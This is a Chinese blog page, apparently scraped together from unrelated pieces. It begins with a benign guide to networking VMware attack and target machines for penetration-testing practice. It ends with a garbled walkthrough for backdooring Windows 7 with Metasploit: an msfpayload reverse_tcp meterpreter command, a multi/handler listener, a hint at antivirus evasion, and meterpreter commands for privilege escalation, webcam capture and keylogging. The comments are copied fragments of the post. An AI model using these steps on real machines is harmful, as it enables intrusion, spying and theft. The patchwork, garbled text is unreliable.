作者:hacker发布时间:2022-07-08分类:破解邮箱浏览:200评论:4
VMWare虚拟机搭建渗透测试的网络环境
1. 问题的提出
通过虚拟机运行Kali Linux或者OWASP WTE,需要靶机来进行渗透测试的学习和研究。比较简单的方式是,靶机也作为虚拟机运行;在渗透机与虚拟机之间建立专门的网络连接。
使用VMWare提供的LAN区段(LAN Segament)是个简单、快捷的解决方案。
2. 步骤说明
设置LAN区段 - 在VMWare中
靶机和渗透机的虚拟机设置 - 在VMWare中
靶机和渗透机的系统网络设置 - 虚拟机内部
2.1 LAN区段(LAN Segament)设置
在VMWare Workstation中,打开目标虚拟机的“虚拟机设置”标签,点选“LAN区段”,如下图:
![点击这里的"LAN区段"按钮]()
点击之后,
+ 如果没有设置过LAN区段,则新建一个LAN区段
+ 如果已经设置过,则选择目标所在的LAN区段
2.2 渗透机/靶机虚拟机设置
在完成了上述LAN区段设置后,虚拟机的网络连接模式设置为“LAN区段”,并选择上述设置的具体区段。
虚拟机和靶机的**设置方法相同**。
2.3 渗透机/靶机的系统设置
进入虚拟机系统内部,需要手动指定IP地址,确保渗透机和靶机在同一网段内。
虚拟机和靶机的**设置方法相同**。
Windows的设置比较简单。
+ 对于没有图形界面的Linux,手动设置方法如下:
1. 关闭网卡,目的在于**清除之前的网络设置**
precode$ ifconfig eth0 down/code/pre
2. 设置新的IP地址等信息,并启动网卡
precode$ ifconfig eth0 192.168.xx.123 netmask 255.255.255.0 up/code/pre
注意,这里最后的up是启动网卡的意思
3. 设置网关gateway,需要使用route命令
precode$ route add default gw 192.168.xx.1
+ 对于有图形界面的Linux,有时候会出现Network Manager显示"device not managed"的情况,特别是在Debian或者Kali底下。
1. 问题是因为同时满足以下条件:
(1) /etc/network/interface文件中包括目标设备(网卡);
(2) /etc/NetworkManager/NetworkManager.conf中没有设定自动管理。
2. 问题解决方法:
(1) 在/etc/NetworkManager/NetworkManager.conf中,设置managed=true
(2) 重启network manager:
precode$service network-manager restart/code/pre
你控制了真实机,虚拟机不己是你掌中物了?
通过渗透到虚拟机,控制真实机才是高难度,因此虚拟机是安全的,被控制、中毒都与真实机无关
在程序和功能窗口中,点击左侧边栏的启用或关闭windows功能快捷链接。找到虚拟机的选项并勾选,然后点击确定按钮即可。
工具/原料:
hp笔记本
windows10
1、右键点击windows桌面左下角的开始按钮,在弹出的菜单中选择设置的菜单项。
2、然后会打开windows设置窗口,点击窗口中的应用图标。
3、接着在打开的应用设置窗口中点击程序和功能快捷链接。
4、接下来在打开的程序和功能窗口中,点击左侧边栏的启用或关闭windows功能快捷链接。
5、在打开的windows功能窗口中可以找到虚拟机的选项,勾选该选项,然后点击确定按钮。
6、这时系统会自动的安装虚拟机需要的文件。
7、待安装完成后,可以在开始菜单中看到虚拟机的快捷链接。
8、点击后就可以打开虚拟机的主界面了。
肯定是需要搭建虚拟机的,搭建渗透环境,本地测试,如果在是实体机上搭建就容易中毒等情况。
很多朋友对使用Metasploit利用后门程序进行渗透windows7都比较感兴趣,针对这些以下业内相关专家就给大家介绍下,当下黑客怎么利用Metasploit进行渗透windows7的。设定目标主机为:cn_win7_x86_7601虚拟机,地址为:192.168.0.116;而本地主机就为:192.168.0.149。方法步骤一:黑客用Msfpayload直接生成相关的后门程序,如下图。sfpayloadwindows/meterpreter/reverse_tcpLHOST=192.168.0.149xsteup.exe方法步骤二:黑客直接就能进入所在的目录并将属性进行修改,换为允许以程序执行文件,详细如下图。进入所在目录,修改属性:选择“允许以程序执行文件”,这时候也可以做一些免杀方法步骤三:接着黑客就打开msfconsole并加载exploit/multi/handler模块并进行设置本地主机,最后就能开始进行监听了,详细情况如下图。打开msfconsole,加载exploit/multi/handler模块,设置本地主机;然后开始监听:exploit-z-j:方法步骤四:黑客需要能将程序直接拷贝都目标主机中并进行执行。方法步骤五:以上步骤全部完成后黑客就能通过后门程序反向连接到msf,用msf就能发起第2次的攻击然后使用客户端也就是后门程序就能连接都服务端msf,详细的如下图。Meterpreter就是metasploit框架中的一个扩展模块,因此的话溢出成功后黑客就能攻击载荷进行使用,一旦攻击载荷在溢出攻击成功后就能再返回一个控制通道,这样就能将它作为攻击载荷成功获得目标系统的一个meterpretershell的链接。另外,附meterpreter常用命令:getsystem#会自动利用各种各样的系统漏洞来进行权限提升migrate#进程id进程迁移background#把当前的会话设置为背景,需要的时候在启用getuid#查看对方正在运行的用户ps#列出所有的进程getpid#返回运行meterpreter的id号sysinfo#产看系统信息和体系结构shell#切换到cmd的系统权限方式exit#退出shell会话返回meterpreter或终止meterpretergetdesktop截取目标主机当前桌面会话窗口runwebcam-p/var/www#在/var/www目录监控目标主机的摄像头keylog_recorder#使用migrate将会话迁移至explorer.exe的进程空间后记录键盘
已有4位网友发表了看法:
访客 评论于 2022-07-08 22:00:32 回复
始按钮,在弹出的菜单中选择设置的菜单项。2、然后会打开windows设置窗口,点击窗口中的应用图标。3、接着在打开的应用设置窗口中点击程序和功能快捷链接。4、接下来在打开的程序和功能窗口中,点击左侧边栏的启用或关闭windows功能快捷链接。5、在打开的windows
访客 评论于 2022-07-09 02:00:44 回复
ervice network-manager restart/code/pre求大牛,怎么通过虚拟机渗透到真实机,以控制虚拟机你控制了真实机,虚拟机不己是你掌中物了?通过渗透到虚拟机
访客 评论于 2022-07-08 21:31:06 回复
down/code/pre 2. 设置新的IP地址等信息,并启动网卡 precode$ ifconfig eth0 192.168.xx.123 netmask 255.255.255.0 up/code/pre 注意
访客 评论于 2022-07-09 01:07:59 回复
虚拟机的网络连接模式设置为“LAN区段”,并选择上述设置的具体区段。虚拟机和靶机的**设置方法相同**。2.3 渗透机/靶机的系统设置 进入虚拟机系统内部,需要手动指定IP地址,确保